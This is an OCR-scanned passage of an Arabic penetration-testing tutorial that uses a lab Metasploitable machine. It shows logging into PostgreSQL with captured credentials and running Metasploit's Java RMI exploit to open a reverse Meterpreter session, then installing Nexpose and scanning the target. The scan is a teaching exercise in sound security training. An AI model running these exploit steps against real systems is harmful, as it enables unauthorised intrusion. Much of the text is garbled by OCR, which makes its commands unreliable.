المحطة الطرفية لدينا في كالي» وسوف نستخدم الأمر الذي استخدمناه للاتصال ب اهS»‏ إلى 
.stg re)‏ وهو اهوم. نحن الآن بصدد وضع خيار ۸- للأمرء ثم سنضع عنوان ۴| الذي نريد 
توصيله. الأمر كالتالي: 


root@kali :~# psql —-h 10.0.2.4 postgres 5 


الآن» سيطلب اسم المستخدم» وسنقوم بإدخال اسم المستخدم. بعد ذلك» سنقوم بإدخال كلمة المرور التي 
استولينا عليها» وهي 0059۲85. تم سنقوم بتسجيل الدخول إلى قاعدة البيانات. بعد ذلك» نحن قادرون 
على تشغيل أي أمر اه5 على الحاسوب الهدف. ا5۵ هي اللغة المستخدمة للتواصل مع قواعد 
البيانات. الآن»ء تمكنا من التقاط اسم المستخدم وكلمة المرور لقاعدة بيانات» ويمكننا التواصل مع قاعدة 
البيانات باستخدام لغة ا5۵. على سبيل المثال» سنقوم بتشغيل أمر 

select current _database(); 8 


يمكننا أن نرى أنه اختار قاعدة البيانات الحالية لديناء والتي تسمى أيضا كهg۲اكهم.‏ 


مجرد إلقاء نظرة على المتال السريع لإظهار أن البيانات التي تم التقاطها صحيحة. سنرى في 
اأoاMetasp.‏ في علامة التبويب 024 ۲۴۵دأم2٥»‏ سنرى أنه لا توجد بيانات تم التقاطها من الحاسوب 
الهدف. ولكن عندما نذهب إلى علامة التبويب ك۴أه٠ل.|»‏ سنرى بعض الملاحظات المهمة» بعضها عن 
طلات ۲۲۴ تعض الطرق الت نفخكتما. هد الملاحقات نة اعماة جم المعارمات. 


الشكل: ملاحظات 
ستظهر علامة تبويب "5۸2۲65 ۴5اأ۴" أي ملف يتم مشاركته من الحاسوب الهدف. ستظهر لنا علامة 
التبويب '"كأم "6^" المحاولات التي قمنا بها على الحاسوب الهدف. ستظهر لنا علامة التبويب 


الوحدات التی یمکن استخدامها لاستغلال أُی نقاط ضعف موجودة. لدينا ثغرة أمنية تسمى 
خادم ا۸۷ ۷4هل ولدينا وحدة نمطية لاكتشاف هذه الثغرة الامنية. سنقوم بتشغيل 


Exploit: Java RMI Server Insecure Default Configuration Java Code Execution 


فقط بالنقر فوق ۸٥١لا2ا.‏ سيسمح لنا بتشغيل الاستغلال من داخل مجتمع اأهامكه)٤6".‏ الان سنقوم 
باستغلال» بنفس الطريقةء فعلنا ذلك من قبل في ءامئهءآو.. بعد النقر على 'تشغيل" (۸٥1۸ھا)ء‏ 
لدينا اسم الوحدة ك /{أoاexp‏ ava_rmi_serverز/misc/ muti‏ لذلك سنقوم بتشغيل الأمر 
server_اava_rmiز/ti/miscاoit/muاexP.‏ وتعیین (اseئ)‏ ۴۸۷10۸0 وتعیین 1۳1051اء وتعیین 


.explolt aî «XRHOST 
في لقطة الشاشة التاليةء يمكننا أن نرى أنه قد تم بالفعل اختيار العنوان الهدف بشكل صحيح» وسنقوم‎ 
م۲ ١oاConnec{i) على (seإاReve)» وسنحافظ على نوع الحمولة‎ ٥( بتعيين انوع الاتصال"‎ 


.(Meterpreter) s (Payload Type) 


Meterpreter‏ هو مجرد نوع مختلف من الحمولة. نحن الان بصدد تشغيل الوحدة من خلال النقر على 
:Run Module‏ 


Target Systems 


Exploit Timeout (minutes 


Target Settings 


Generic (Java Payload) ۲ 
Payload Options 
Meterpreter ۲ 1024-635 
Reverse Y 
Module Options 
10 
1099 
0.0.0.0 
8080 


Advanced Options 
FEva sion Options 


@ Run Module 


Ref erences 


۳ 


ploit Community 4.1 1.7 - Update 2016052401 © 2010-2016 Rapid7 Inc, Boston, MA 


Selection of Meterpreter :Jكill‎ 


في لقطة الشاشة التاليةء يمكننا أن نرى أن الوحدة (٥اا۵ه")‏ قد تم تشغيلها وأن المخرجات 


تشبه إلى 


حد كبير ما نحصل عليه من وحدة التحكم في أأهامكه6/. وتقول إن الجلسة 1 مفتوحة. لقد أنشأت 


ec N OE 
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erv lew Analysis 0 am pa igns Web Apps Modules Credentials Re ports Ex ports 


خا تافو اوی نے 


Workspace:metasploitable Progress:1/2 (5O) Exploiting 10.0.2.4 
Started reverse TCP handler on 0.0.0.0:1104 

10.0.2.4:1099 - Using URL: http://0.0.0.0: 8080/Cj aXzKiaTAaB4v 
10.0.2.4:1099 - Local IP: http://10.0.2.15:8080/Cj mXzKiaTAaB4v 
10.0.2.4:1099 - Server started. 

10.0.2.4:1099 - Sending RMI Header... 

10.0.2.4:1099 - Sending RMI Call... 

10.0.2.4:1099 - Replied to request for payload JAR 

Sending stage (46112 bytes) to 10.0.2.4 

10.0.2.4:1099 - Server stopped. 

Workspace:netasploitable Progress:2/2 (100k) Complete (1 session opened) exploit/nulti/misc/java_rai_server 


RRRRRRRRRRS 
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Output of Meterpretera :Ja 


في لقطة الشاشة السابقةء يمكننا أن نرى تبويب جلسات (5١0أءءه5]).‏ له رقم 1. إذا نقرنا عليه سنراهاء 
لدينا جلسة مفتوحة وهي على جهاز عاطه†اه‌امsها6.‏ ويستخدم خادہم ۸N‏ ۷aول‏ كما هر موضح 
في الصورة التالية: 


/ Project: metasploltable Account - zald ¥ Administration Y 7 10| 


ny Overview Analysts Se" OQ C am pa iqna Web Appa Moxhute a C rede ntin ls Re porta € sports Tasks 


an manne ۹END 


Go colect APF Cleanup 


Active Sessions 

SESSION 05 noST TYPE AGE OESCAIP NON ATIACK MOOULE 

D Session 7 ۵ 0 20 14 204 - mertaspioit stie Meterpieter less Than a maante © JAVA AMIL SERS 
Closed Sessions 


No closed sessions 


RAPID 
هة‎ 04 


الجلسة السابعةء» سنرى كل الأشياء التي يمكننا القيام بها على الحاسوب. 


_ | metas Nab 
YL t ( 
Overview Anaham U C am pa iqas Web Apps Moxhuies C rede nt la h 
Session 
N Oo 
Avaılable A 
1 


Axcess Filesysien 


Command shell جIرخإ شكل:‎ 


هناء يتم استخدام 'جمع بيانات النظاء" (028 ۴۳ءاءر5 {cءcماامC)‏ للحصول على بعض البيانات 
الحساسةء لكننا لن نتمكن من استخدام ذلك؛ لأنه كل شيء بالإصدار ۲١‏ ولدينا إصدار المجتمع. 
يستخدم ۴5/56۳|ا١٣‏ كدععءA‏ للوصول إلى نظام الملفات. يحتوي على مستعرض ملفات يستند إلى 
الويب» حتى نتمكن من استعراض ملفات الحاسوب الهدف. يتم استخدام اا5 comand‏ للحصول 
على موجه الأوامر الخاص ب ١۴6١م166۲.‏ أنه يحتوي على قذيفة أمر ١6١١١م166۲‏ التي تتيح لنا 
استخدام حمولة ١۲۴6م166۲.‏ الاآن» لدينا إمكانية الوصول الكامل إلى الحاسوب الهدف» ونحن قادرون 
على القيام بأي شيء نريد القيام به على ذلك. أأهامكة6 تفعل كل شيء لنا من خلال المتصفح. لم 
يكن لدينا للذهاب وتشغيل اهأمكةا6. وتكوين الحمولة والاستغلال يدويا. 


java WV point ۵ 
Installing Nexpose | Ne×مص0٬5e ثبت‎ 


سنناقش في هذا القسم الأداة ال تسمى ع5٠0م×ه..‏ هذه الأداة مصنوعة من قبل 147م۸4. يتكون 
Nexpose‏ من قبل نفس الأشخاص Jin .Community Metasploit , Metasploit |ږlaج jıùll‏ 


tyاcommun‏ tاoاMetasp.‏ يحتوي على واجهة المستخدم الرسومية على الويب» ويسمح لنا باكتشاف 
نقاط الضعف. كما أنه يستخدم لتعيين نقاط الضعف هذه للاستغلالات الحالية. الفرق بين أأهامءهم“ 
Community‏ و „a Nexpose‏ ن Metasploit Community‏ أظهر لنا فقط الاستغلالات التي 
یمکن استخدامها داخل ااه‌ام‌sھ)6/.‏ ویظهر لنا ۸۴×08 استغلالات تم نشرها في مکان آخر غیر 
R27‏ و ااoاMetasp.‏ إنه يظهر لنا المزيد من نقاط الضعف» ويعمل على نطاق واسع. يساعدنا 
أيضًا في إنشاء تقرير في نهاية الفحص» ويمكننا مشاركة هذا التقرير مع الأشخاص التقنيين أو مع 
المديرين. كما أنه يساعدنا على إنشاء عمليات مسح للجدول الزمني. لنفترض» على سبيل المثالء أننا 
نعمل على شركة بنية تحتية كبيرة ونريد إجراء عمليات مسح منتظمة كل أسبوع أو كل شهر» ستكون هذه 
الأداة مفيدة لنا. 

لا تأتي هذه الأداة مثبتة مسبقًا مع أاج)ء لذلك يتعين علينا تنزيلها. لتنزيلهاء نحتاج إلى استخدام اسم 
الشركة وعنوان البريد الإلكتروني الخاص بالشركة. استخدم الرابط التالي لتنزيله: 


https: //www.rapid7.com/products/nexpose/download/ 


قبل تثبيته» يتعين علينا إيقاف خادم ا5۵١/9و1ءه۴‏ الذي يعمل في ×د" أا أاة۴. استخدم الأمر التالي 
root@kali :~# service postgresql stop‏ 

بمجرد إيقاف ا5۵ سنقوم بتغيير الدليل إلى sكدها"سه0‏ باستخدام الأمر 4ء. إذا قمنا بإدراج قائمة 

الملفات الحاليةء فسنجد ملف الإعداد 1۸ط .u×64ہذا-مu٤م47SامهRa.‏ أول شيء سنفعله هو تغيير 

الأذونات إلى ملف قابل للتنفيذ حتى نتمكن من تنفيذ هذا الملف. في ×لا”أاء لتغيير الإذن الذي نستخدمه 

في الأمر ١٥1۳ء‏ ثم سنضع الإذن الذي نريد تعيينه» وهو قابل للتنفيذ×+» وسنضع اسم الملف» وهو 

.N Rapid 7 Setup-Linux6 4. bin‏ الأمر کالتالي: 


root@kali | foot@kali :~# cd Download| cd | foot@kali :~# cd Download| 


root@kali :~/ Download# ls 


root@kali :~/ Download# chmod +x Rapid 7Setup— 
Linux64.bin 


لتشغيل أي ملفات قابلة للتنفيذ في ×ا٣‏ اء سنقوم بكتابة /. ثم ادخل اسم الملف وهر —-}ض7Seu Rapid‏ 
¡.u×64ہiا.‏ الأمر کالتالي: 


root@kali :~/ Download# ./Rapid7Setup-Linux64.bin 
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RAPID Welcome to the Rapid7 Installation Wizard 


Rapid? Yulnerability Management reduces your organization's risk by 
dynamically collecting data and analyzing risk across vulnerabilities, 
: Welcome configurations and controls from the endpoint to the cloud. Our wulnera bility 
ٍ management platform is engineerecd to enable IT security teams to identify, 
License agreement assess and respond to critical change as it happens. 


Type and destination 


OL Rapid7 Inc 
Requirements 
http: www. ra pic 7. co rm 
Account retails info @rapid7.com 
Shortcut loratio r +1. BBB. TRAPID? [Toll Free] 


Confirm selections +1.B17.247.1717 


Installation progress 
Console details 


Installation success 


Cancel 


java WV point 


فيما يلي الخطرات الاسا ةا هة 


الخطوة 1: علينا أن نضغط على التالي كما هو موضح في الصورة أعلاه. ثم سوف يطلب منا قبول 
الاتفاق. انقر فوق قبول» ثم انقر فوق التالي. وسوف تتيح لنا المضي قدما من خلال التثيت. 


الخطوة 2: الآن» سيطلب منا وضع منفذ قاعدة البيانات التي سيتم استخدامها مع 058م×6'. تم تعيين 


المنفذ بالفعل على 5432 لذلك لن نقوم بتغييره. سنضغط على التالي: 


The installer is comparing your system settings to required settings 


Installation requirements 


see the list of supported versions. 
Recommended and sul i 


rted configurations can be found here. 


sf SELinux is not active 
iF Software is5 not running. 
FF Access to external networks was detected. 


oF Port 3780 is available. 


Database port 


Enter the number for the port that the database will listen on: 


The port number ıs walid. 


LaREë| 


RAPID 


Welcome 
Type and destination 
° Requirements 
Account details 
Shortcut location 
Confirm selectiors 
Installation progress 
Console details 


Installation SLIEEESS 


الخطوة 3: الآنء يتعين علينا وضع الاسم الأول واسم العائلة والشركةء ثم يتعين علينا وضع اسم 


المستخدم وكلمة المرور. بعد ذلك انقر على التالي: 
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Create your account information 


User details: This information will be used for generating S5S5L certificates, and it 
will be included in requests to Technical Support. 


First name: Last name: 
License agreement SEET ¦ lbansal 
Type and destination ۰ 

Company: 
Requirements 

XY Z.COM 


» Account details 
1 Letters, numbers, spaces, and the characters - + @ & . _ ' only. All felas are required. 
Ssmorteut location 


Confirm selections Credentials: Choose secure credentials and remember them. Tou will need therm 


Installation progress to perform configuration steps after completing the installation. 
sTallaATIOn progress 


Console detalls User name: ا‎ 0O ا‎ 


Installation success 


Password: Confirm the password: 


EE ETE EETEEE و‎ HEEEEEOEHEETEE ا‎ 


strength: aaa xxx Strona 


Require password reset upon login? [7) 


The passwords match. 


ECE 
الخطوة 4: تأكد من عدم تحديد المربع الموضح في لقطة الشاشة التالية. إذا حددنا هذا المريع أثناء‎ 
التثبيت» فسنواجه الكثير من المشكلات. سنذهب لتثيته ثم نبدأً تشغيله لاحقًا عندما نريد استخدامه.‎ 


سنجعل هذا المربع غير محدد. وهذا كل شيءء» الآن سيقوم بتثبيته لنا: 
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RAPID Confirm or change your installation selections 


You have selected the following Installation location: 
optrapid7fnex pose 
Welcome You have selected the following component(s)] to install: 
security Console, Scan Engine 
Type and destination You have entered the following contact information: 
Requirements anshika bansal, xyz.com 
EE You have created the following user name: 
anshll 
Select any additional installation tasks. 


Shortcut location 


» Confirm selections 


| | | Initialize and start after installation 
Installation progress چ‎ 


Console details 


Installation success 


8 
Cancel Frey iDLIS Next 


الخطوة 5 بمجرد نجاح التثبيت› سنضغخط علی 'إنهاء": 


Account details 3. Wait 10 to 30 minutes for the Security Console to initialize during first 
E time startup depending on your system capabilities, 

Confirm selections 
Installation progress To start the service run: sudo systemctl start nexposeconsole. service 


Console details The Security Console is configured to automatically run at startup. See the 
installation guide If you wish to modify start modes, 


a» Installation success 
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الآن تم تثبیت ۴×058 ۱ بنجاح. دعونا نری کیف یمکننا تشغیله وماذا تفعل الأداة. یستخدم 0s6م×۸e‏ 


قاعدة البيانات الخاصة به» وبالتالى فان أول شىء سنفعله هو إيقاف تشغيل قاعدة بيانات ×ل"أا أاج). 
إذا كنا كلا من قاعدة البيانات تعمل على نفس المنفذ» فسيتعارضان مع بعضهما البعض. الآن» سوف 
نوقف خادم ا٩519۲۴5٥م.‏ يجب أن نتذكر أنه قبل تشغيل ٥5٥م×6 ١‏ نقوم بإيقاف تشغيل قاعدة البيانات 
الخاصة بنا. أمر إيقاف قاعدة البيانات الخاصة بنا هو كما يلى: 


0 root@kali :~# service postgresql stop 5 


الآن» سوف ننتقل إلى الموقع حيث قمنا بتثبيت 058م×6۴". ما لم نغير الموقع أثناء عملية التثيت. سيتم 
تثبیت 8٥5٥م×۴.‏ في دلیل 5۵٥م×۳۵7/۸۵ه۲/٤٥0/.‏ يتم تخزين الملف الذي يقوم بتشغيل الخادم في 
دلیل ۰٥5٥‏ والملف الذي نرید تشغیله یسمی ..5٥.5۸‏ 


root@kali | root@kali :~# cd /opt/rapid7/nexpose cd | root@kali :~# cd /opt/rapid7/nexpose 
root@kali : | root@kali : /opt/rapid7/nexpose #Is | root@kali : /opt/rapid7/nexpose #Is ls 


root@kali : /opt/rapid7/nexpose # cd nsc 


root@kali : | root@kali : /opt/rapid7/nexpose # ls | root@kali : /opt/rapid7/nexpose # ls Is 


لتشغيل أي ملف قابل للتنفيذء سنقوم بكتابة /. ثم ادخل اسم الملف وهو 50.5۸". الأمر كالتالي: 


root@kali : /opt/rapid7/nexpose/nsc # .Insc.sh 0 


قد يستغرق تشغيل هذا الأمر لأول مرة بعض الوقت. في لقطة الشاشة التاليةء يمكننا أن نرى أن الأداة 
قد تم تحميلها بنجاح. يخبرنا أنه يمكننا التنقل إليه باستخدام ۸1ل: 


https: //localhost: 3780/ 


[INFO] Accepting web server logins. 

BAIA OEIC AE ULISE SEL IE NEGRhNttps://localhost:3780/ 

[INFO] Initializing data warehouse export service... 

[INFO] Removing old JRE versions... 

[INFO] Finished removing old JRE versions. 

[INFO] Initializing IDP credential provider. 

[INFO] [Started: 2018-07-11712:37:53] [Duration: 0:00:00.003] Completed initializing IDP credential provider. 


[INFO] Starting policy usage statistics status task. 

[INFO] [Started: 2018-07-11712:37:53] [Duration: 0:00:00.106] Completed policy usage statistics status task. 
[INFO] Done with statistics generation [Started: 2018-07-11712:37:53] [Duration: 0:00:00.098]. 

[INFO] [Updater: Default] Establishing HTTP connection with updates.rapid7.com via proxy updates.rapid7.com: 80. 
[INFO] Checking for partially deleted sites on all silos. 

[INFO] Accepting console commands. 


سنقوم الان Ek‏ بتشغيل متصفحنا ونسح عنوان URL‏ الي قدمه لنا للتو. بعل ذلك سبطلب منا ادخال اسم 
المستخدم وكلمة المرور اللذين أنشأناهما عند تيت الأداةء بعد التسجيل بنجاح» سيطلب منا إدخال 
مفتاح | لمنتج كما هو موضح في لقطة الشاشة التالية: 


Activate a new license 


s You need an active license for scanning and reporting. To activate 
automatically over the Internet, use a product key. If you do not have a key 


request one. 


ACTIVATE WITH KEY‏ ا و ا ا 


Llse a license file 7 


GANCEL 


نحن نعلم أنها نسخة مجانية وعندما نرلنا الأداةء كان علينا ملء نموذج. في هذا النموذج» كان علينا 
وضع عنوان بريدنا الإلكتروني. أرسلت هذه الأداة مفتاح المنتج إلى بريدنا الإلكتروني» لذلك سوف نذهب 
إلى بريدنا الإلكتروني والحصول على مفتاح المنتج ولصقه. بعد اللصق» انقر فوق A۸٥C۲۱۷۸۲۱0۸N‏ 
۴۴۲ 1 ۲ا. في لقطة الشاشة التاليةء يمكننا أن نرى أن التنشيط ناجح وأنه يعرض علينا فقط معلومات 


حول الترخيص . 


Create 


RISK AND ASSETS OVER TIME 


Assets Risk Score Highest-risk Site Highest-risk Asset Group Highest-risk Asset Highest-risk Tag 


N/A N/A N/A N/A 


SITES 


CURRENT SCANS FOR ALL SITES 


سنذهب إلى الصفحة الرئيسية )٠٠٥۳6(‏ من القائمة اليسرى. بعد ذلك» سنضيف هدفاء ثم سنقوم بإجراء 
اختبار . للقيام بذلك» أول ما سنفعله هو النقر فوق 'إنشاء" (۲۴۵6) والنقر فوق 'الموقع' (86) لإضافة 


هدف : 


Lrealê A 


Asset Group 
Dynamic Asset Group 
Heporî 


Site 


سنقوم بتعيين الم .metasploitable yle‏ 


الآن سوف نذهب إلى علامة التبويب الأصول )۸55٤78(‏ وسنقوم بإضافة الهدف. يمكن أن يكون 
الهدف مجموعة. يمكننا إضافة عنوان ۴| محدد بنفس الطريقة التي أضفناها عندما كنا نقوم بأشياء اختراق 


الشبكة باستخدام م۸۳3۲ع2. في هذا المثال» نستهدف جهاز ءاطه†امامده)6. سنقوم بإضافة هدف 
جهاز مء اطه)tاoامMetas.‏ وهو 10.0.2.4ء وسنضيف هذا إلى مجموعة اسمها أكع): 


٤ 9 


e 
INFO & SECURITY AUTHENTICATION TEMPLATES ENGINES ALERTS SCHEDULE 


1 Assets Browse... No file selected. 0 Assets Browse... No file selected. 


10.0.2.4 X* 


0 Asset Groups 0 Asset Groups 


الآن» في علامة تبویب التوثیق (۸۲۱0۸٥۸N۲۱٤١۲۳ل1ا۸)»‏ إذا كان الهدف يستخدم نوعًا من المصادقةء 
فلا يمكن لأحد الوصول إلى الهدف إلا إذا احتاج إلى المصادقة مع نوع من الخوادم مثل خادم ۴۲۴ أو 
6ا أو مصادقة 1۲۲۴ على الويب أو خادم ا5۵. يمكننا اختياره من علامة تبويب التوثيق› 
وادخال المجال )0۳31١(‏ واسم المستخدم وكلمة المرور. بهذه الطريقة» سيكون الإطار قادرا على 
المصادقة مع ذلك الخادم واختبار أمان خادمنا. لكن خادمنا لا يستخدم أي نوع من المصادقةء لذلك نحن 
لسنا في حاجة إليها. إذا كنا نستهدف تطبيق ويب يحتوي على صفحة تسجيل دخول» على سبيل المثالء 
ا1ت» فلن نتمكن من الوصول إلى معظم ميزات ا6۳2 إلا إذا قمنا بتسجيل الدخول باستخدام اسم 
مستخدم معين وكلمة مرور معينة. باستخدام هذه الميزةء يمكننا تسجيل الدخول ثم اختبار أمان هدفنا. 

يتم استخدام علامة التبويب 1۴1۲1۸۲٤58‏ لتحديد نوع المسح. فيها أنواع مسح مختلفة مثل ۸۳١2۲‏ 260. 
لقد رأينا في 2۸۳3P‏ إجراء مسح سريع واجراء مسح سريع + ومسح مكثف. نفس الشيء. كل ملف 
تعريف مختلف» ويقوم بمسح اشفا مختلفة. في هذا القسم» سوف نستخدم نوع المسح ك "ull audi†‏ 


:enhanced logging without Web Spider 


0 E 0 


INFO & SECURITY ASSETS AUTHENTICATION TEMPLATES ENGINES ALERTS SCHEDULE 


SELECT SCAN TEMPLATE Selected Scan Template: Full audit without Web Spider 
O Filter 
Name A Asset Discovery Service Discovery Checks Source 
Denial of service ICMP, TCP UDP Default TCP, Default Custom 8 تخ‎ 
Discovery Scan ICMP, TCP, UDP Custom TCP, Custo Disabled 5 
Discovery Scan - Aggressive ICMP, TCP, UDP Custom TCP, Custo Disabled 3 
Exhaustive ICMP, TCP UDP Full TCP, Default UDP Safe Only 8 
Full audit ICMP TCP UDP Default TCP Default Custom 3 
Full audit enhanced logging without Web Spider ICMP, TCP UDP Default TCP, Default Custom 3 
¬ Full audit without Web Spider ICMP TCP, UDP Default TCP, Default .. Custom 3 
a ETE ICMP TCP UDP Default TCP, Default .. Safe Only 9 
Internet DMZ audit Disabled Default TCP Custom 3 
Linux RPMS ICMP, TCP UDP Custom TCP Custom 3 
ب‎ 


Spi‏ ۷6 هي آداة تستخدم للعتور على جميع الملفات والدلائل لأهدافنا. سنحاول التدقيق الكامل 
بدون 108۲م5 0/٥‏ وهو الافتراضي. سنقوم بالبحث عن منافذ ۴ع | و 1٤۴‏ و 0۴لا. نترکھ کما 


و 


سنترك علامة تبويب 'المحرك" (٤NاN6ع])‏ بنفس الطريقةء مما يعني أنها ستستخدم المحرك المحلي 
الذي تم تثبيته بدلاً من استخدام المحرك الذي تم توفيره بواسطة .۸4٥۵07‏ يتم استخدام علامة التبويب 
تنبيه" (۸16۲۲) لإعداد تنبيهات مخصصة حتى يتم العثور على إشعار عند العثور على ثغرة أمنية. الآن 
سوف نلقي نظرة على علامة التبويب جدول (٤ا2۷0٤۳1٤5).‏ إنها ميزة رائعة حقًا. لنفترض الآن ننا 
نعمل على شركة تستمر في دفع الكود أو الكود الجديد كل يوم» أو ربما نقوم باختبار اليوم» وكل شيء 
نعمله جيد. خادم الويب الخاص بناء برامجناء كل شيء محدث ولا توجد نقاط ضعف فيها. دعنا نقول 
ربما شخصًا ما يكتشف ثغرة جديدة من خلال برنامج نستخدمه على خادم الويب الخاص بناء أو ريما 
دفعنا رمرًا جديا مستضعفا في مشروعنا. لم نعد آمنين. تتيح لنا هذه الميزة جدولة هذا الاختبار بحيث 
يتم تشغيله كل ساعة أو كل أسبوع أو كل شهر حسب مدى أهميته. لذلك» نحن بصدد إنشاء جدول 
وانشاء جدول. في هذا الجدول الزمني» يمكننا تحديد تاريخ البدءء ويمكننا ضبط التردد على كل يوم. 


0 لي‎ 2 Y 
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MANAGE SCHEDULES Set Scan Time @ 


CREATE SCHEDULE 


Enabled 
MANAGE BLACKOUTS 


Name 
CREATE BLACKOUT 


Start Date 


Start Time HH MM 4 AM (GMT -04:00) Eastern Time (US & Canada) 


Scan Template Full audit without Web Spider 


Scan Engine 

Specify Subset of Leave unchecked to scan assets according to the default site configuration ¢} 

Assets 

Frequency One Time Schedule 

Duration Weeks Days Hours Minutes 


Reaches Duration 


أنشأنا هذا الجدول» وبعد المسح سيتم تشغيله على الفاصل الزمني الذي نحدده. يمكننا الحصول عليه 
لإنتاج تقرير لنا. 

الجزء الأكثر أهمية هو أننا وضعنا هدفنا في علامة التبويب الأصول .)۸55٤۲5(‏ ثم نختار قالبًا من 
علامة التبويب 1۴1۴۲1۸۲۴5 . لقد تم تكوين كلتا علامتي التبويب» وسنقوم بالنقر فوق 'حفظ )52۷٥(‏ 
ومسح »")5٥4١(‏ مما سيؤدي إلى حفظ هذا التكوين وبدء المسح لنا. في لقطة الشاشة التاليةء يمكننا أن 
نرى أن اكتشاف أصولنا قيد التقدم» وبعد ذلك» سنتحدث عن النتائج التي حصالنا عليها: 


metasploitable | View all sites 
Full audit without Web Spider | View all scans 


SCAN PROGRESS 


Scan Type Started Assets Vulnerabilities Total Elapsed Scan Assets Scanned Scan Engine 
Time 
Marmural TA 2018 1:14 A 0 0 34 seconds Local scan engine 


ا 


Asset discovery is in progress... 
Active: O, Pemding: Û, Complete: O 
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تحلبل Nexpose analysis Nexp0ose‏ 
بمجرد انتهاء الفحص» نكون على صفحة التأكيدات (ك٤٣#ءءخ).‏ في لقطة الشاشة التاليةء يمكننا أن 
نرى أن لدينا أصلا واحدًا تم مسحه» وأن الأصل يعمل على أويونتو. المهارات التي نحتاج إلى اختراقها 
في هذا الأصل هي المبتدئ (eءiاهN):‏ 


1 Assets | 1 0 0 ۰ 


License Usage: 1 / 512 (0.20%) 
| 
ASSET CHARTS 
ج‎ Assessment Status = Assets by Operating System = Exploitable Assets by Skill Level 
E Di 
SCANNED 
Address Name Site Operating System + 6 Vulnerabilities Risk YW Assessed Last Scan Delete 
METASPLOITABLE metasploitable Ubuntu Linux 8.04 0 175 306 156,313 Yes Thu Jul 12 7 
2018 ۰ 


كما نرى في لقطة الشاشة السابقةء یعرض لنا 8٤٥م×۸.۴‏ معلومات أکثر بکثیر من مجتمع أ0اMetasp.‏ 
مع0م×e٥N‏ هو إطار إدارة ثغرات أمنية أكثر تقدمًا. 


يمكننا أن نرى في لقطة الشاشة التاليةء قمنا بفحص هدف واحد وهر NE ASP|O!I7AB)L€٤‏ والموقع 
عالمي (ا2طها). وهو يعمل على 8.04 ×ںہ اا tu‏ uطلا.‏ لم نكتشف أي برامج ضارة و175 
استغلال و306 نقاط ضعف. مع Commu ¡iY‏ oitاMetasp.‏ اكتشفنا فقط تغرة أمنية واحدة قابلة 
للاستغلال و8 وحدات يمكن استخدامها. ولكن في 58٥م×6۴»‏ اكتشفنا 306 نقاط ضعف. في هذاء 
اكتشفنا العديد من نقاط الضعف والاستغلال آکثر من مجتمع اأه|اMetasp.‏ 


يمكننا أن نرى أن هناك عامل خطر . يمكننا أيضًا رؤية آخر مرة تم فيها إجراء الفحص. إذا مررنا للأسفلء 
فيمكننا رؤية نظام التشغيل الذي اكتشفناه وهو 8.04 ×د٣‏ اا اا٣‏ اطلا. يمكننا رؤية البرنامچ المثبت 
على الحاسوب الهدف: 


OPERATING SYSTEMS 


Operating System Product Vendor Architecture Instances ¥ 
Ubuntu x86 1 
f 1 1 
SOF TWARE 
Program ¥ Class CPE Instances 


بعد أن نجحنا في اختراقهاء من المفيد جدا العثور على عمليات الاستغلال المحلية التي يمكن استخدامها 
لزيادة امتيازاتنا. على سبيل المثال» إذا حصانا على مستخدم عادي وأردنا أن نصبح الجذرء فيمكننا عندئذ 
تجاوز سعة المخزن المؤقت المحلي لزيادة امتيازاتنا أو القيام بأي نوع آخر من الأشياء. في مرحلة ما بعد 
الاستغلال» هذه مفيدة الغاية. 

إذا نزلنا للأسفل» فيمكننا أن نرى الخادمات المثبتة على الحاسوب الهدف. يمكننا أن نرى أن الخادمات 
المختلفة تعمل متل 1۲١۲‏ وNS‏ وما إلى ذلك: 
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SERVICES 


Service Name 


Instances w 


status 
portmapper 
mountd 


NFS lockd 


DNS 
CIFS 
XWindows 
VNC 


Showing 1 to 10 of 21 Rows per page: 10 of 3 


إذا نقرنا على أي من هذه الخادمات» فسنرى المزيد من المعلومات عنها. على سبيل المثال»ء إذا نقرت 
على خدمة 17۲۴ء فسنحصل على وصف عنها والمنافذ التي تعمل عليها. في لقطة الشاشة التالية 
یمکننا أن نری أن 1۲۲۲۶ يعمل على المنفذ 80 والمنفذ 8180: 

HyperText Transfer Protocol | View all services 


DESCRIPTION 


HTTP the Hyper Text Transfer Protocol, is used to exchange multimedia content on the World Wide Web. The multimedia files commonly used with HTTP include text, sound, 
images and video. 


ASSETS 

Address ¥ Name Site Product Port 

10.0.2.4 METASPLOITABLE metasploitable HTTPD 2.2.8 8180 
10.0.2.4 METASPLOITABLE metasploitable HTTPD 2.2.8 80 


Showing 1 to 2 of 2 | ت‎ Export to CSV Rows per page: 10 1 of 1 


الآن» دعونا ننتقل لأعلى» واذا أردنا إلقاء نظرة فاحصة على نقاط الضعف» فيمكننا الانتقال إلى صفحة 
نقاط انlضaز :(Vulnerabilities)‏ 


VULNERABILITY CHARTS 


Vulnerabilities by CVSS Score = Exploitable Vulnerabilities by Skill Level 


E Novice (5) 
WW Intermediate (1 6] 


Expert (61) 
E 2-35 )22( ۰ 
No known exploit (Z24) 


O0 - 1.9 (13 


في لقطة الشاشة السابقةء يمكننا أن نرى أن لدينا رسمًا بيانيًا عن نقاط الضعف التي تم تصنيفها استنادًا 
إلى عامل الخطر وبناءَ على مستوى المهارة من أجل استغلال هذه التغرات الأمنية. في الجانب الأيسر› 
يتم تصنيفها بناءَ على عامل الخطر» وعلى الجانب الأيمن» يتم تصنيفها على أساس مستوى المهارة. 
أثناء التمرير لأسفل» يمكننا رؤية قائمة بجميع نقاط الضعف» ويمكننا التبديل بينها باستخدام الأسهم: 


VULNERABILITIES 


Apply Filters (O applied) 
Title Ca bb CVSS Risk ¥ Published On Modified On Severity Exceptions 
NC rd iS "| 993 Fri Jan 01 1999 Tue Dec 03 2013 Critical 1 @ Exclude 
shell Backd 919 Thu Jan 01 1970 Sat Jun 24 2017 Critical 1 @ Exclude 
MySQL d'‘ 1 901 Tue Dec 31 2002 Thu Aug 22 2013 Critical 1 @ Exclude 
Defaul tU: ™ 899 Mon Nov 09 2009 Fri Jun 03 2016 Critical 1 @ Exclude 
USN-8 libxml2 vul ili 1 887 Fri Sep 12 2008 Tue Jul 04 2017 Critical 1 @ e: 
JSN- libxml2 vul ili 1 887 Fri Sep 12 2008 Tue Jul 04 2017 Critical @ :ع‎ 
MySQL C 885 Wed Jul 25 2007 Thu Jul 10 2014 Critical @ :ع‎ 
BINL vin i 882 Tue Jan 15 2008 Tue Nov 15 2016 Critical 2 A: 
JSN-803 bilit 1 881 Tue Jul 14 2009 Tue Jul 04 2017 Critical @ Exclude 
ISN-€ TLS vul biliti 879 Wed May 21 2008 Tue Jul 04 2017 Critical @ Exclude 


N pe 9 


